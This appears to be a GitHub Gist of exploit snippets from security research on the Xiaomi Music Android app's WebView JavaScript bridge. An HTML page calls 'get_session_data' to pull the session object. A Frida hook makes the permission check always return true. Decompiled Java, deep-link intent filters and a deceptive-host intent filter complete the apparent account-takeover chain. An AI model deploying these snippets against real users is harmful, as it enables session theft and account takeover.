Skip to content

Instantly share code, notes, and snippets.

View ato.html
<html>
<body>
<script src='remote-server/jsBridge-mix.js'> //host the jsBridge-mix.js from resources directory
JsBridge.invoke("get_session_data", {}, function(a) { //the a variable will contain the response JSON object from the Java code
var i = {};
i = a;
window.alert(JSON.stringify(i);
})
</script>
</body>
View frida.js
Java.perform(function() {
console.log("Starting hook");
var Activity = Java.use("com.xiaomi.music.hybrid.internal.PermissionManager");
Activity.isValid.implementation = function () {
return true;
};
Java.choose("com.xiaomi.music.hybrid.internal.Config", {
onMatch: function(inst) {
View config.java
private String config(Config config, boolean z) {
if (z) {
SecurityManager securityManager = new SecurityManager(config, this.mActivity.getApplicationContext());
if (securityManager.isExpired() || !securityManager.isValidSignature()) { // validation of the config object
return new Response(202).toString();
}
}
this.mFM = new FeatureManager(config, this.mActivity.getClassLoader());
this.mPM = new PermissionManager(config);
return new Response(0).toString();
View invoke.java
public String invoke(String str, String str2, String str3, String str4) {
if (!this.mPM.isValid(this.mPageContext.getUrl())) {
return new Response(203).toString();
}
Request request = new Request();
request.setAction(str2);
request.setRawParams(str3);
request.setPageContext(this.mPageContext);
request.setView(this.mView);
request.setNativeInterface(this.mNativeInterface);
View jsinterface.java
@JavascriptInterface
public String config(String str) {
String config = this.mManager.config(str);
if (Log.isLoggable("hybrid", 3)) {
Log.d("hybrid", "config response is " + config);
}
return config;
}
@JavascriptInterface
View hybridmanager.java
private void initView() {
initSettings(this.mView.getSettings());
this.mView.setWebViewClient(new HybridViewClient(this));
HybridChromeClient hybridChromeClient = new HybridChromeClient();
hybridChromeClient.setHybridManager(this);
this.mView.setWebChromeClient(hybridChromeClient);
if (HybridView.DEBUG) {
WebView.setWebContentsDebuggingEnabled(true);
}
HybridView hybridView = this.mView;
View parsefragment.java
public static FragmentInfo parseFragment(Uri uri) {
if (uri == null || !FeatureConstants.SCHEME.equals(uri.getScheme())) {
return null;
}
IDeviceCompat deviceCompat = IApplicationHelper.CC.getInstance().getDeviceCompat();
Uri adapter = DisplayCompact.adapter(uri);
if (adapter == null) {
return null;
}
IAppInstance.CC.getInstance().OnlineServiceHelperCheckOnlineUriAndOpenSwitch(IApplicationHelper.CC.getInstance().getContext(), adapter);
View musicbrowseractivity.java
public boolean dispatch(Intent intent, boolean z) {
MusicLog.i(TAG, "dispatch uri: " + intent.getData());
if (PrivacyCheckHelper.isAgreeMusicPrivacy() || canIgnorePrivacy(intent) || PrivacyCheckHelper.isSkipMusicUserTerm()) {
MediaPlaybackServiceProxy mediaPlaybackServiceProxy = this.mPlaybackService;
if (mediaPlaybackServiceProxy == null) {
MusicLog.e(TAG, "mPlaybackService is NULL, skip this dispatch");
return false;
}
if (!mediaPlaybackServiceProxy.hasService()) {
this.mHandler.sendEmptyMessageDelayed(2, 1500);
View music-manifest.xml
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:scheme="miui-music" android:host="play"/>
<data android:scheme="miui-music" android:host="view"/>
<data android:scheme="miui-music" android:host="detail"/>
<data android:scheme="miui-music" android:host="home"/>
<data android:scheme="miui-music" android:host="search"/>
<data android:scheme="miui-music" android:host="artist"/>
View task-decep.xml
<intent-filter android:autoVerify="true">
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<category android:name="android.intent.category.BROWSABLE" />
<data
android:path="/deceive.html"
android:host="recon.takemyhand.xyz"
android:scheme="https" />
</intent-filter>